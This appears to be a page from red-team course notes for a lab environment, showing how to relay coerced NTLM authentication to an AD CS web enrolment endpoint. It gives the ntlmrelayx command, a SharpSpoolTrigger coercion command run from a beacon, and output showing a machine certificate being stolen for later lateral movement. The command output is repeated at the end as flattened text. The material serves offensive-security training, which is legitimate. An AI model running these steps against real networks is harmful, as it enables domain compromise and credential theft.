NTLM Relaying to ADCS HTTP Endpoints

AD CS services support HTTP enrolment methods and even includes a GUI. This endpoint is usually found at http[s]://<hostname>/certsrv.

If NTLM authentication is enabled, these endpoints are vulnerable to NTLM relay attacks. A common abuse method is to coerce a domain controller to authenticate to an attacker-controlled location, relay the request to a CA to obtain a certificate for that DC, and then use it to obtain a TGT.

An important aspect to be aware of is that you cannot relay NTLM authentication back to the originating machine. We therefore wouldn't be able to relay a DC to a CA if those services were running on the same machine. This is indeed the case in the RTO lab, as each CA is running on a DC.

Another good way to abuse this primitive is by gaining access to a machine configured for unconstrained delegation.

We already have access to WEB as jking, but this is another way of achieving the same end.

To achieve this, we need:

PortBender on Workstation 2 to capture traffic on port 445 and redirect it to port 8445.
A reverse port forward to forward traffic hitting port 8445 to the team server on port 445.
A SOCKS proxy for ntlmrelayx to send traffic back into the network.

The ntlmrelayx command needs to target the certfnsh.asp page on the ADCS server.

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

Then force the authentication to occur from WEB to WKSTN-2.

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102

[*] Servers started, waiting for connections
[*] SMBD-Thread-4: Received connection from 127.0.0.1, attacking target https://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:443-<><>-OK
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against https://10.10.122.10 as DEV/WEB$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 13
[*] Base64 certificate of user WEB$:MIIRRQ[...]qDRJLE

The S4U2Self trick can be used to obtain usable TGS's to move laterally to it.

PreviousMisconfigured Certificate Templates NextUser & Computer Persistence

Last updated 1 year ago

attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections

[*] Servers started, waiting for connections [*] SMBD-Thread-4: Received connection from 127.0.0.1, attacking target https://10.10.122.10 |S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:443-<><>-OK [*] HTTP server returned error code 200, treating as a successful login [*] Authenticating against https://10.10.122.10 as DEV/WEB$ SUCCEED [*] Generating CSR... [*] CSR generated! [*] Getting certificate... [*] GOT CERTIFICATE! ID 13 [*] Base64 certificate of user WEB$:MIIRRQ[...]qDRJLE